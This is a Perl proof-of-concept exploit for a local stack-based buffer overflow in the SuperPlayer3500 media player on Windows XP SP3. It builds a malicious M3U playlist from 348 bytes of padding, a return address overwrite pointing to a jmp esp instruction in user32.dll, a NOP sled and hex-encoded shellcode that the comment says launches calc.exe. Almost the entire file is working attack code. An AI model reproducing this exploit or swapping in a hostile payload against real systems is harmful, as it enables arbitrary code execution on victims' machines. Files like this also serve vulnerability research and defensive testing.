#!/usr/bin/perl

#SuperPlayer3500 Local stack based buffer overflow
#Author:jun
#Email:haojunhou@gmail.com
#Date:Tue Jul 22 2013
#Vendor Link:http://www.haojie.cn
#Software Link:http://www.haojie.cn/download/setup_3500.exe
#App Version:3500
#Tested on:windows xp sp3

$file = "superplay3500exp.M3U";
$junk = "A" x 348;
$eip = pack('V', 0x77d29353); #jmp esp on user32.dll
$nops = "\x90" x 20;

#exec calc.exe
$shellcode =
"\x33\xc9\xb8\xd1\xa3\x3d\x27\xda\xdf\xd9\x74\x24\xf4\xb1" .
"\x32\x5a\x83\xc2\x04\x31\x42\x0c\x03\x93\xaf\xdf\xd2\xef" .
"\x58\x96\x1d\x0f\x99\xc9\x94\xea\xa8\xdb\xc3\x7f\x98\xeb" .
"\x80\x2d\x11\x87\xc5\xc5\xa2\xe5\xc1\xea\x03\x43\x34\xc5" .
"\x94\x65\xf8\x89\x57\xe7\x84\xd3\x8b\xc7\xb5\x1c\xde\x06" .
"\xf1\x40\x11\x5a\xaa\x0f\x80\x4b\xdf\x4d\x19\x6d\x0f\xda" .
"\x21\x15\x2a\x1c\xd5\xaf\x35\x4c\x46\xbb\x7e\x74\xec\xe3" .
"\x5e\x85\x21\xf0\xa3\xcc\x4e\xc3\x50\xcf\x86\x1d\x98\xfe" .
"\xe6\xf2\xa7\xcf\xea\x0b\xef\xf7\x14\x7e\x1b\x04\xa8\x79" .
"\xd8\x77\x76\x0f\xfd\xdf\xfd\xb7\x25\xde\xd2\x2e\xad\xec" .
"\x9f\x25\xe9\xf0\x1e\xe9\x81\x0c\xaa\x0c\x46\x85\xe8\x2a" .
"\x42\xce\xab\x53\xd3\xaa\x1a\x6b\x03\x12\xc2\xc9\x4f\xb0" .
"\x17\x6b\x12\xde\xe6\xf9\x28\xa7\xe9\x01\x33\x87\x81\x30" .
"\xb8\x48\xd5\xcc\x6b\x2d\x27\x3c\xa6\xbb\xb0\xe7\x53\x86" .
"\xdc\x17\x8e\xc4\xd8\x9b\x3b\xb4\x1e\x83\x49\xb1\x5b\x03" .
"\xa1\xcb\xf4\xe6\xc5\x78\xf4\x22\xa6\x1f\x66\xae\x29"."\r\n";

open(FILE,">$file");
print FILE $junk.$eip.$nops.$shellcode;
close(FILE);